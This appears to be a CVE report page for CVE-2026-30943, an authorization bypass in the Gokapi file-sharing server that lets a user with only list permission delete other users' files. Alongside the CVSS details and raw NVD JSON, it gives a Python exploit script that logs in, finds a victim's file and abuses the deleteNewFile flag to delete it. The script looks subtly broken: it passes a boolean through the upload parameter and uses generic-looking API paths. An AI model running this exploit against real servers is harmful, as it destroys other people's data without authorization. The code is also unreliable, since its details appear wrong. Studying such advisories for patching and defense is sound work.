Security Vulnerability Report
CVE-2026-30943 CVSS 4.1 MEDIUM


Published: 2026-03-13 19:54:36
Last Modified: 2026-03-17 13:48:40

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, an insufficient authorization check in the file replace API allows a user with only list visibility permission (UserPermListOtherUploads) to delete another user's file by abusing the deleteNewFile flag, bypassing the requirement for UserPermDeleteOtherUploads. This vulnerability is fixed in 2.2.4.

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:* - VULNERABLE
Gokapi < 2.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-30943 PoC
# Gokapi < 2.2.4 Authorization Bypass via File Replace API

target_url = "http://target-server:53842"

# Authentication - user with only UserPermListOtherUploads
auth_data = {
    "username": "attacker",
    "password": "password123"
}

# Step 1: Login to obtain session
login_url = f"{target_url}/api/v1/login"
session = requests.Session()
login_response = session.post(login_url, json=auth_data)
if login_response.status_code != 200:
    print("[-] Login failed")
    exit(1)
print("[+] Login successful")

# Step 2: List files to find victim's file ID
list_url = f"{target_url}/api/v1/files"
files_response = session.get(list_url)
files = files_response.json()
if not files or len(files) == 0:
    print("[-] No files found")
    exit(1)

# Get first victim's file ID
victim_file_id = files[0]["id"]
print(f"[+] Found victim file: {victim_file_id}")

# Step 3: Exploit - Replace file with deleteNewFile flag to delete victim's file
replace_url = f"{target_url}/api/v1/files/{victim_file_id}/replace"
exploit_data = {
    "deleteNewFile": True,  # Key parameter for exploitation
    "file": ("malicious.txt", b"exploited", "text/plain")
}
exploit_response = session.post(replace_url, files=exploit_data)
if exploit_response.status_code == 200:
    print("[+] File deleted successfully - Authorization bypassed!")
else:
    print(f"[-] Exploitation failed: {exploit_response.status_code}")
    print(exploit_response.text)
```

References

https://github.com/Forceu/Gokapi/releases/tag/v2.2.4 (Product, Release Notes)
https://github.com/Forceu/Gokapi/security/advisories/GHSA-j6jp-78w8-34x6 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-30943",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:54:35.573",
    "lastModified": "2026-03-17T13:48:39.590",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An insufficient authorization check in the file replace API allows a user with only list visibility permission (UserPermListOtherUploads) to delete another user's file by abusing the deleteNewFile flag, bypassing the requirement for UserPermDeleteOtherUploads. This vulnerability is fixed in 2.2.4."
      },
      {
        "lang": "es",
        "value": "Gokapi es un servidor de intercambio de archivos autoalojado con soporte para expiración automática y cifrado. Antes de la versión 2.2.4, una comprobación de autorización insuficiente en la API de reemplazo de archivos permite a un usuario con solo permiso de visibilidad de lista (UserPermListOtherUploads) eliminar el archivo de otro usuario abusando del flag deleteNewFile, eludiendo el requisito de UserPermDeleteOtherUploads. Esta vulnerabilidad se corrigió en la versión 2.2.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
            "baseScore": 4.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
            "baseScore": 4.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.2.4",
                "matchCriteriaId": "CE6F3F4D-D449-43DD-BB3D-86F98581926C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Forceu/Gokapi/releases/tag/v2.2.4",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-j6jp-78w8-34x6",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```